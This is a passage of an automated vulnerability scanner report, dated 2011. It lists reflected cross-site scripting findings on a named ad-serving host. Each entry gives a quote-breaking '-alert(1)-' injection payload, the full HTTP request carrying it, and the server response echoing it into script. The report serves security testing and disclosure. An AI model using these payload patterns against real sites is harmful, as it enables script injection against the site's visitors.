Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 498
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:30:52 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 15:30:52 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord=935450012?53ce5'-alert(1)-'ddc0eb33dd9;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.25. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/edh.mayoclinic/eyevision/general

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28853'-alert(1)-'72ac924f984 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/edh.mayoclinic/eyevision/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;ord=935450012?&28853'-alert(1)-'72ac924f984=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 501
Date: Wed, 11 May 2011 15:31:25 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 15:31:25 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord=935450012?&28853'-alert(1)-'72ac924f984=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.26. http://a.collective-media.net/cmadj/bzo.217/L3_5490311 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.217/L3_5490311

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70ea8'-alert(1)-'562779ec2ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj70ea8'-alert(1)-'562779ec2ef/bzo.217/L3_5490311;sz=300x250;net=bzo;ampc=http://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAsSqS3y8BAAAAAAAAADRmMmQ3NDM2LTdiZGYtMTFlMC1iZTNjLTBiZWIyOGUxOTU2ZQCCvgEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=1305125989;env=ifr;ord1=584484;cmpgurl=http%253A//ad.burstdirectads.com/st%253Fad_type%253Diframe%2526ad_size%253D300x250%2526section%253D1858209%2526bur%253D2016%2526x%253Dhttp%253A//www.burstnet.com/ads/ad21832a-map.cgi/BCPG175222.253833.315920/VTS%253D2jBaC.Ncac/SZ%253D300X250A/V%253D2.3S//ST%253D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc/REDIRURL%253D? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAuB6F61E4EUAzMzMzMzMTQLgehetROBFAMzMzMzMzE0AzMzMzM7McQAAAAAAAACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACrjY0s4YgTCsqWZcF5804wEfQ4arOobmuhkNzvAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D2016%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBaC.Ncac%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D2162042623%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,4f2d7436-7bdf-11e0-be3c-0beb28e1956e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:30:45 GMT
Connection: close
Content-Length: 8245

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-51112901_1305127845","http://ad.doubleclick.net/adj70ea8'-alert(1)-'562779ec2ef/bzo.217/L3_5490311;net=bzo;u=,bzo-51112901_1305127845,11f8f328940989e,Miscellaneous,bzo.slqz-bzo.e6d-bzo.T8P-bzo.h3i-bzo.d8n-bzo.c9q-dx.16-dx.23-dx.17-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak
...[SNIP]...

5.27. http://a.collective-media.net/cmadj/bzo.217/L3_5490311 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.217/L3_5490311

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload defdd'-alert(1)-'33bd626a147 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.217defdd'-alert(1)-'33bd626a147/L3_5490311;sz=300x250;net=bzo;ampc=http://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAsSqS3y8BAAAAAAAAADRmMmQ3NDM2LTdiZGYtMTFlMC1iZTNjLTBiZWIyOGUxOTU2ZQCCvgEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=1305125989;env=ifr;ord1=584484;cmpgurl=http%253A//ad.burstdirectads.com/st%253Fad_type%253Diframe%2526ad_size%253D300x250%2526section%253D1858209%2526bur%253D2016%2526x%253Dhttp%253A//www.burstnet.com/ads/ad21832a-map.cgi/BCPG175222.253833.315920/VTS%253D2jBaC.Ncac/SZ%253D300X250A/V%253D2.3S//ST%253D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc/REDIRURL%253D? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAuB6F61E4EUAzMzMzMzMTQLgehetROBFAMzMzMzMzE0AzMzMzM7McQAAAAAAAACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACrjY0s4YgTCsqWZcF5804wEfQ4arOobmuhkNzvAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D2016%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBaC.Ncac%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D2162042623%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,4f2d7436-7bdf-11e0-be3c-0beb28e1956e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:30:52 GMT
Connection: close
Content-Length: 8236

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-75896266_1305127852","http://ad.doubleclick.net/adj/bzo.217defdd'-alert(1)-'33bd626a147/L3_5490311;net=bzo;u=,bzo-75896266_1305127852,11f8f328940989e,Miscellaneous,bzo.slqz-bzo.e6d-bzo.T8P-bzo.h3i-bzo.d8n-bzo.c9q-dx.16-dx.23-dx.17-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1
...[SNIP]...

5.28. http://a.collective-media.net/cmadj/bzo.217/L3_5490311 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.217/L3_5490311

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53c87'-alert(1)-'6fe0dcb5410 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.217/L3_549031153c87'-alert(1)-'6fe0dcb5410;sz=300x250;net=bzo;ampc=http://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAsSqS3y8BAAAAAAAAADRmMmQ3NDM2LTdiZGYtMTFlMC1iZTNjLTBiZWIyOGUxOTU2ZQCCvgEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=1305125989;env=ifr;ord1=584484;cmpgurl=http%253A//ad.burstdirectads.com/st%253Fad_type%253Diframe%2526ad_size%253D300x250%2526section%253D1858209%2526bur%253D2016%2526x%253Dhttp%253A//www.burstnet.com/ads/ad21832a-map.cgi/BCPG175222.253833.315920/VTS%253D2jBaC.Ncac/SZ%253D300X250A/V%253D2.3S//ST%253D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc/REDIRURL%253D? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAuB6F61E4EUAzMzMzMzMTQLgehetROBFAMzMzMzMzE0AzMzMzM7McQAAAAAAAACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACrjY0s4YgTCsqWZcF5804wEfQ4arOobmuhkNzvAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D2016%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBaC.Ncac%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D2162042623%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,4f2d7436-7bdf-11e0-be3c-0beb28e1956e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:30:55 GMT
Connection: close
Content-Length: 8236

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-92358910_1305127855","http://ad.doubleclick.net/adj/bzo.217/L3_549031153c87'-alert(1)-'6fe0dcb5410;net=bzo;u=,bzo-92358910_1305127855,11f8f328940989e,Miscellaneous,bzo.slqz-bzo.e6d-bzo.T8P-bzo.h3i-bzo.d8n-bzo.c9q-dx.16-dx.23-dx.17-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1-mm.as1-mm.
...[SNIP]...

5.29. http://a.collective-media.net/cmadj/bzo.217/L3_5490311 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.217/L3_5490311

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dba06'-alert(1)-'4db594ba125 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.217/L3_5490311;sz=dba06'-alert(1)-'4db594ba125 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAuB6F61E4EUAzMzMzMzMTQLgehetROBFAMzMzMzMzE0AzMzMzM7McQAAAAAAAACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACrjY0s4YgTCsqWZcF5804wEfQ4arOobmuhkNzvAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D2016%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBaC.Ncac%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D2162042623%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,4f2d7436-7bdf-11e0-be3c-0beb28e1956e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:29:58 GMT
Connection: close
Content-Length: 7554

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
1;net=bzo;u=,bzo-71692882_1305127798,11f8f328940989e,none,bzo.slqz-bzo.e6d-bzo.T8P-bzo.h3i-bzo.d8n-bzo.c9q-dx.16-dx.23-dx.17-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1-mm.as1-mm.da1;;sz=dba06'-alert(1)-'4db594ba125;contx=none;dc=w;btg=bzo.slqz;btg=bzo.e6d;btg=bzo.T8P;btg=bzo.h3i;btg=bzo.d8n;btg=bzo.c9q;btg=dx.16;btg=dx.23;btg=dx.17;btg=cm.weath_h;btg=cm.sports_h;btg=mm.aa1;btg=mm.ah1;btg=mm.aj1;btg=mm.ak1;btg=mm
...[SNIP]...

5.30. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/edh.mayoclinic/eyevision/general

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload def87'-alert(1)-'799373a668c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjdef87'-alert(1)-'799373a668c/edh.mayoclinic/eyevision/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord=935450012;ord1=331865;cmpgurl=http%253A//www.mayoclinic.com/health/pink-eye/DS00258? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:32:22 GMT
Connection: close
Content-Length: 7566

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("wfm-4650518_1305127942","http://ad.doubleclick.net/adjdef87'-alert(1)-'799373a668c/edh.mayoclinic/eyevision/general;net=wfm;u=,wfm-4650518_1305127942,11f8f328940989e,eye,wfm.eye_h-wfm.health_m-dx.16-dx.23-dx.17-cm.ent_h-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1-mm.as
...[SNIP]...

5.31. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/edh.mayoclinic/eyevision/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d232a'-alert(1)-'a44c4f88b6b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/edh.mayoclinicd232a'-alert(1)-'a44c4f88b6b/eyevision/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord=935450012;ord1=331865;cmpgurl=http%253A//www.mayoclinic.com/health/pink-eye/DS00258? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:32:25 GMT
Connection: close
Content-Length: 7572

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
